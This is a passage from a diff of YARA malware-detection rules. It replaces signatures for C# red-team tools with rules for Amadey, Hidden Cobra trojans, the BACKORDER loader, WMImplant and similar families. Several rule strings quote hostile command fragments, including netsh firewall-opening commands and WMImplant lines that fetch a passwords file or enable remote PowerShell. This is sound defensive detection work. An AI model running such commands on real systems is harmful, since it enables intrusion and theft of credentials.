+		id = "3bbfddb8-011a-52dd-b0c8-b35e6f740507"
+		date = "2017-12-11"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/snc85M"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_zxshell.yar#L115-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "07f220695607b5aa6cda9045c3bc1e434828cb5835154710969666482dbe09c4"
+		logic_hash = "361441404582b0eaca25954f7fe1a3a3b9fefd15cac78d61408bc50aeb78bb61"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dd01e7a1c9b20d36ea2d961737780f2c0d56005c370e50247e38c5ca80dcaa4f"
 
 	strings:
-		$typelibguid0lo = "7e3f231c-0d0b-4025-812c-0ef099404861" ascii wide
+		$x1 = "ncProxyXll" fullword ascii
+		$s1 = "Uniscribe.dll" fullword ascii
+		$s2 = "GetModuleFileNameDll" fullword ascii
+		$s4 = "$Hangzhou Shunwang Technology Co.,Ltd0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "de481441d675e9aca4f20bd8e16a5faa" or pe.exports ( "PerfectWorld" ) or pe.exports ( "ncProxyXll" ) or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Inferno : FILE
+rule SIGNATURE_BASE_EXT_SUSP_OBFUSC_Macos_Roothelper_Obfuscated : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "af2d9832-c7f9-5879-a19b-a3c4d91b8b3f"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/LimerBoy/Inferno"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3430-L3443"
+		description = "Yara for the public tool 'roothelper'. Used by XCSSET (https://gist.github.com/NullArray/f39b026b9e0d19f1e17390a244d679ec)"
+		author = "im0prtp3"
+		id = "7ff91c00-8178-525c-bb41-d09cf7cda588"
+		date = "2021-06-07"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/imp0rtp3/status/1401912205621202944"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hktl_roothelper.yar#L2-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6e286b28bdc490d16892926ba95227d39aebb151067896e740d497024c526c0e"
-		score = 75
-		quality = 85
+		logic_hash = "2121de0409f3f8e4c4e079944efb605776e0475cadc25607eb888cc6461ecaf3"
+		score = 65
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "26d498f7-37ae-476c-97b0-3761e3a919f0" ascii wide
+		$a1 = "E: neither argv[0] nor $_ works." fullword
+		$b1 = "shll=%s\n" fullword
+		$b2 = "argv[%d]=%.60s\n" fullword
+		$b3 = "getenv(%s)=%s\n" fullword
+		$b4 = "argc=%d\n" fullword
+		$b5 = "argv=<null>\n" fullword
+		$c1 = "%s%s%s: %s\n" fullword
+		$c2 = "x%lx" fullword
+		$c3 = "=%lu %d" fullword
+		$c4 = "%lu %d%c" fullword
+		$f1 = "rmarg"
+		$f2 = "chkenv"
+		$f3 = "untraceable"
+		$f4 = "arc4"
+		$f6 = "stte"
+		$f7 = "with_file"
+		$opcodes_1 = { 99 F7 7D ?? 4C 63 C2 42 0F B6 14 01 0F B6 3D }
+		$opcodes_2 = { C6 [3] 00 00 00 C6 [3] 00 00 00 C6 [3] 00 00 00 8A 05 [2] 00 00 0F B6 [3] 00 00 89 CA }
+		$opcodes_3 = { E8 [2] FF FF	8B 85 ?? F? FF FF 2B 85 ?? F? FF FF	83 ?? 01 89 85 ?? F? FF FF E9 ?? 00 00 00 }
+		$weak_opcodes_1 = {48 8B 45 ?? 48 8B 00 48 3B 45 ??	0F 95 C1 88 4D ??}
+		$weak_opcodes_2 = {	48 8B 45 ??	48 83 38 ??	0F 95 C1 88 4D ?? }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and ( $a1 or 3 of ( $b* ) or 5 of ( $f* ) or all of ( $opcodes* ) or ( 2 of ( $b* ) and ( 2 of ( $c* ) or 2 of ( $opcodes* ) ) ) or ( 3 of ( $c* ) and 4 of ( $f* ) ) or ( 2 of ( $opcodes* ) and ( all of ( $weak_opcodes* ) or 3 of ( $c* ) ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsearch : FILE
+rule SIGNATURE_BASE_MAL_Win_Amadey_Jun25 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "459d8a34-f311-5459-8257-e7aa519174b5"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/djhohnstein/SharpSearch"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3445-L3458"
+		description = "This rule detects intrinsic patterns of Amadey version 5.34"
+		author = "0x0d4y"
+		id = "a697ef8a-168f-5310-8b23-c504c630be5a"
+		date = "2025-06-18"
+		modified = "2025-07-24"
+		reference = "https://0x0d4y.blog/amadey-targeted-analysis/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_win_amadey_jun25.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1a383fd8e4ec8fa9f1fbc01bdeb3d5b1e32ec825a24c1eaad6c42e86ac682530"
-		score = 75
+		logic_hash = "08dc17aa8f7e83bc349339a9a1b48184b094d8c66273d7199a15b206c6416946"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		yarahub_reference_md5 = "1db72c5832fb71b29863ccc3125137a0"
+		yarahub_uuid = "853111b8-e548-46a9-8f5a-ec8621343e0d"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		malpedia_family = "win.amadey"
 
 	strings:
-		$typelibguid0lo = "98fee742-8410-4f20-8b2d-d7d789ab003d" ascii wide
+		$rc4_algorithm = { 8a 96 ?? ?? ?? ?? 0f b6 86 ?? ?? ?? ?? 03 f8 0f b6 ca 03 f9 81 e7 ff 00 00 80 79 ?? 4f 81 cf 00 ff ff ff 47 8a 87 ?? ?? ?? ?? 88 86 ?? ?? ?? ?? 46 88 97 ?? ?? ?? ?? 81 fe 00 01 00 00 7c }
+		$s_MZ_PE_validation = { b8 4d 5a ?? ?? 66 39 06 0f 85 a8 01 ?? ?? 8b 7e 3c 03 fe 81 3f 50 45 00 00  }
+		$s_loop_through_pe_section = { 8b 4c 24 0c 03 ce 03 4e 3c 6a ?? ff b1 08 01 ?? ?? 8b 81 0c 01 00 00 03 c6 50 8b 81 04 01 ?? ?? 03 44 24 20 50 ff 74 24 30 ff 15 f4 f0 44 00 8b 4c 24 10 0f b7 47 06 41 83 44 24 0c 28 89 4c 24 10 3b c8 }
+		$s_str_decryption_algorithm = { 8b cb 0f 43 35 ?? ?? ?? ?? 2b c8 8d 04 0a 33 d2 f7 f3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and $rc4_algorithm and 2 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsecdump : FILE
+rule SIGNATURE_BASE_SUSP_Doc_Windowsinstaller_Call_Feb22_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "492dfb79-541a-589d-ac69-468e9b2ab9db"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/G0ldenGunSec/SharpSecDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3460-L3473"
+		description = "Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts."
+		author = "Nils Kuhnert"
+		id = "8f2e8f91-74e0-5574-9c0a-1479d6114212"
+		date = "2022-02-26"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/threatinsight/status/1497355737844133895"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_maldoc.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "749130efbcdbd068bf4711cc5e4960eb97a3ae2ddadde2beb0ff707429495484"
-		score = 75
+		logic_hash = "279182487ab7d35264adfbd0d122ee7634cd92ae1711de78ec7f20928df34f49"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tlp = "white"
 
 	strings:
-		$typelibguid0lo = "e2fdd6cc-9886-456c-9021-ee2c47cf67b7" ascii wide
+		$ = "WindowsInstaller.Installer$"
+		$ = "CreateObject"
+		$ = "InstallProduct"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32be( 0 ) == 0xd0cf11e0 and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Net_Gpppassword : FILE
+
+rule SIGNATURE_BASE_SUSP_Xored_URL_In_EXE : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a718f9fc-acf5-536e-81d6-d393cebe8f77"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/outflanknl/Net-GPPPassword"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3475-L3488"
+		description = "Detects an XORed URL in an executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f83991c8-f2d9-5583-845a-d105034783ab"
+		date = "2020-03-09"
+		modified = "2022-09-16"
+		reference = "https://twitter.com/stvemillertime/status/1237035794973560834"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_xor.yar#L4-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "46ae3156e5428c40278b124b7206b68922f955a297077df3288722c154d09fba"
-		score = 75
+		logic_hash = "2113324ae04a9022be4cf5c615ad231206eeefb5aa87a2236ec3c9deee9e7ec2"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "00fcf72c-d148-4dd0-9ca4-0181c4bd55c3" ascii wide
+		$s1 = "http://" xor
+		$s2 = "https://" xor
+		$f1 = "http://" ascii
+		$f2 = "https://" ascii
+		$fp01 = "3Com Corporation" ascii
+		$fp02 = "bootloader.jar" ascii
+		$fp03 = "AVAST Software" ascii wide
+		$fp04 = "smartsvn" wide ascii fullword
+		$fp05 = "Avira Operations GmbH" wide fullword
+		$fp06 = "Perl Dev Kit" wide fullword
+		$fp07 = "Digiread" wide fullword
+		$fp08 = "Avid Editor" wide fullword
+		$fp09 = "Digisign" wide fullword
+		$fp10 = "Microsoft Corporation" wide fullword
+		$fp11 = "Microsoft Code Signing" ascii wide
+		$fp12 = "XtraProxy" wide fullword
+		$fp13 = "A Sophos Company" wide
+		$fp14 = "http://crl3.digicert.com/" ascii
+		$fp15 = "http://crl.sectigo.com/SectigoRSACodeSigningCA.crl" ascii
+		$fp16 = "HitmanPro.Alert" wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( ( $s1 and #s1 > #f1 ) or ( $s2 and #s2 > #f2 ) ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Filesearcher : FILE
+rule SIGNATURE_BASE_APT_Hiddencobra_Enc_PK_Header : HIDDEN_COBRA TYPEFRAME FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1b5f1f68-f87b-5e60-94a4-e2556b4e6c5d"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/NVISO-BE/FileSearcher"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3490-L3503"
+		description = "Hidden Cobra - Detects trojan with encrypted header"
+		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
+		id = "5d7001b3-162c-5a97-a740-1b8e33d4aa9e"
+		date = "2018-04-12"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ar18_165a.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b72d3a7104ca7718d3d490149483a5d2d30790fb6d2b00b10c69da43c491e577"
+		logic_hash = "d0c8345b69e5f421fd93bc239031f2e51a120ae64be1eca0c1fdae2aa55ac42a"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
+		incident = "10135536"
+		category = "hidden_cobra"
+		family = "TYPEFRAME"
+		hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4"
 
 	strings:
-		$typelibguid0lo = "2c879479-5027-4ce9-aaac-084db0e6d630" ascii wide
+		$s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }
+		$s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }
+		$s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Adfsdump : FILE
+rule SIGNATURE_BASE_APT_Hiddencobra_Import_Obfuscation_2 : HIDDEN_COBRA TYPEFRAME FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8cb2edcd-3696-5857-90ca-e99b1af54320"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/fireeye/ADFSDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3505-L3518"
+		description = "Hidden Cobra - Detects remote access trojan"
+		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
+		id = "bc139580-a55b-514f-8a4e-ca1402ce3ad9"
+		date = "2018-04-12"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ar18_165a.yar#L21-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3735495d2c3a0b6f9de278014d5450f3d2e78dda9c04ede614550c75a05b43d2"
+		logic_hash = "d52fc053afc6b3beb35a6dfd0f9b3714a5bad4e9b0dcfcce7be87d65f0a0c23e"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
+		incident = "10135536"
+		category = "hidden_cobra"
+		family = "TYPEFRAME"
+		hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
 
 	strings:
-		$typelibguid0lo = "9ee27d63-6ac9-4037-860b-44e91bae7f0d" ascii wide
+		$s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F}
+		$s1 = {B6 DF 01 FD 48 B5 }
+		$s2 = {B6 D5 0E F3 4E B5 }
+		$s3 = {B7 DF 0E EE }
+		$s4 = {B6 DF 03 FC }
+		$s5 = {A7 D3 03 FC }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharprdp : FILE
+rule SIGNATURE_BASE_APT_NK_AR18_165A_Hiddencobra_Import_Deob : HIDDEN_COBRA TYPEFRAME FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d316ec0b-0313-52bb-923d-512fa08112f9"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/0xthirteen/SharpRDP"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3520-L3533"
+		description = "Hidden Cobra - Detects installed proxy module as a service"
+		author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
+		id = "f403d589-be35-57a7-9675-f92657c11acc"
+		date = "2018-04-12"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ar18_165a.yar#L43-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "96a5d82e8d03b6242d69cbd5bca2fcc3d4403e7a51099a37dcf9091a0bd53b6e"
+		hash = "ae769e62fef4a1709c12c9046301aa5d"
+		hash = "e48fe20eblf5a5887f2ac631fed9ed63"
+		logic_hash = "2eff83738ca4f2db8327c1ee2a9539d7ce882a315025a656d391c16079e432cb"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "HIDDEN_COBRA, TYPEFRAME, FILE"
+		incident = "10135536"
+		category = "hidden_cobra"
+		family = "TYPEFRAME"
 
 	strings:
-		$typelibguid0lo = "f1df1d0f-ff86-4106-97a8-f95aaf525c54" ascii wide
+		$ = { 8a 01 3c 62 7c 0a 3c 79 7f 06 b2 db 2a d0 88 11 8a 41 01 41 84 c0 75 e8}
+		$ = { 8A 08 80 F9 62 7C 0B 80 F9 79 7F 06 82 DB 2A D1 88 10 8A 48 01 40 84 C9 75 E6}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcall : FILE
+rule SIGNATURE_BASE_APT_NK_AR18_165A_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "172415b6-0383-5da4-a88f-8ebe5daf9294"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/jhalon/SharpCall"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3535-L3548"
+		description = "Detects APT malware from AR18-165A report by US CERT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "45f5205d-7f69-5646-aef8-f95d139f9720"
+		date = "2018-06-15"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ar18_165a.yar#L62-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4b4a8943e4fc07f41ce87d64266fd56af9912832b688f21769f4fe5a8152703b"
+		logic_hash = "7b87c537c9ff38329a5e1e39d5ad1d6cef724c580f246721443eab603534b29d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359"
 
 	strings:
-		$typelibguid0lo = "c1b0a923-0f17-4bc8-ba0f-c87aff43e799" ascii wide
+		$s1 = "netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=%d action=allow enable=yes" fullword wide
+		$s2 = "netsh.exe firewall add portopening TCP %d \"PortOpenning\" enable" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ysoserial_Net : FILE
+rule SIGNATURE_BASE_MAL_BACKORDER_LOADER_WIN_Go_Jan23 : LOADER GOLANG BACKORDER MALWARE WINDOWS FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "80483cd4-76e6-5629-bed7-4ae2e455222c"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/pwntester/ysoserial.net"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3550-L3564"
+		description = "Detects the BACKORDER loader compiled in GO which download and executes a second stage payload from a remote server."
+		author = "Arda Buyukkaya (modified by Florian Roth)"
+		id = "90a82f2c-be92-5d0b-b47e-f47db2b15867"
+		date = "2025-01-23"
+		modified = "2025-03-20"
+		reference = "EclecticIQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_win_go_backorder_loader.yar#L1-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d775864610e2e60faa3570746aa7a689bd719b02c3a47f43a2be097e4a81c5a"
-		score = 75
+		hash = "70c91ffdc866920a634b31bf4a070fb3c3f947fc9de22b783d6f47a097fec2d8"
+		logic_hash = "9e79ec9e58e02b7660383ff20957b95bc3c61ed3badc9af3d5829ebe5bf6bd7b"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "LOADER, GOLANG, BACKORDER, MALWARE, WINDOWS, FILE"
 
 	strings:
-		$typelibguid0lo = "e1e8c029-f7cd-4bd1-952e-e819b41520f0" ascii wide
-		$typelibguid1lo = "6b40fde7-14ea-4f57-8b7b-cc2eb4a25e6c" ascii wide
+		$GoBuildId = "Go build" ascii
+		$x_DebugSymbol_1 = "C:/updatescheck/main.go"
+		$x_DebugSymbol_2 = "C:/Users/IEUser/Desktop/Majestic/"
+		$s_FunctionName_1 = "main.getUpdates.func"
+		$s_FunctionName_2 = "main.obt_zip"
+		$s_FunctionName_3 = "main.obtener_zip"
+		$s_FunctionName_4 = "main.get_zip"
+		$s_FunctionName_5 = "main.show_pr0gressbar"
+		$s_FunctionName_6 = "main.pr0cess"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 10MB and $GoBuildId and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Managedinjection : FILE
+rule SIGNATURE_BASE_Wmimplant
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c66e7666-b54f-532d-90e1-870292047aec"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/malcomvetter/ManagedInjection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3566-L3581"
+		description = "Auto-generated rule - file WMImplant.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "18dadc55-e12f-5c4c-9e11-27dc2d6c8dd2"
+		date = "2017-03-24"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_wmi_implant.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eac722f30fea497f98d75293514e0f6f4dd17263c7377211605b1ab2f13ddf2f"
+		logic_hash = "6422514d25b723e7ab92c1af1301e51d9a93aa41da98791d96c4754a91b5a18e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "860d7c237c2395b4f51b8c9bd0ee6cab06af38fff60ce3563d160d50c11d2f78"
 
 	strings:
-		$typelibguid0lo = "e5182bff-9562-40ff-b864-5a6b30c3b13b" ascii wide
-		$typelibguid1lo = "fdedde0d-e095-41c9-93fb-c2219ada55b1" ascii wide
-		$typelibguid2lo = "0dd00561-affc-4066-8c48-ce950788c3c8" ascii wide
+		$x1 = "Invoke-ProcessPunisher -Creds $RemoteCredential" fullword ascii
+		$x2 = "$Target -query \"SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')" ascii
+		$x3 = "WMImplant -Creds" fullword ascii
+		$x4 = "-Download -RemoteFile C:\\passwords.txt" ascii
+		$x5 = "-Command 'powershell.exe -command \"Enable-PSRemoting" fullword ascii
+		$x6 = "Invoke-WMImplant" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsocks : FILE
+rule SIGNATURE_BASE_SUSP_ELF_LNX_UPX_Compressed_File : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "343061d9-e24e-5d49-939f-b94c295b17ac"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/nettitude/SharpSocks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3583-L3597"
+		description = "Detects a suspicious ELF binary with UPX compression"
+		author = "Florian Roth (Nextron Systems)"
+		id = "078937de-59b3-538e-a5c3-57f4e6050212"
+		date = "2018-12-12"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_elf_file_anomalies.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "477adf09ee9d04888ee5e352c11e95f855c433588771138ebb5970cae7aa044f"
-		score = 75
+		logic_hash = "0d310de1ab68bd6da9ae057c7edea0d6b24d408f85ec40c2306f1ac8a2bc2f55"
+		score = 40
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4"
 
 	strings:
-		$typelibguid0lo = "2f43992e-5703-4420-ad0b-17cb7d89c956" ascii wide
-		$typelibguid1lo = "86d10a34-c374-4de4-8e12-490e5e65ddff" ascii wide
+		$s1 = "PROT_EXEC|PROT_WRITE failed." fullword ascii
+		$s2 = "$Id: UPX" fullword ascii
+		$s3 = "$Info: This file is packed with the UPX executable packer" ascii
+		$fp1 = "check your UCL installation !"
 
 	condition:
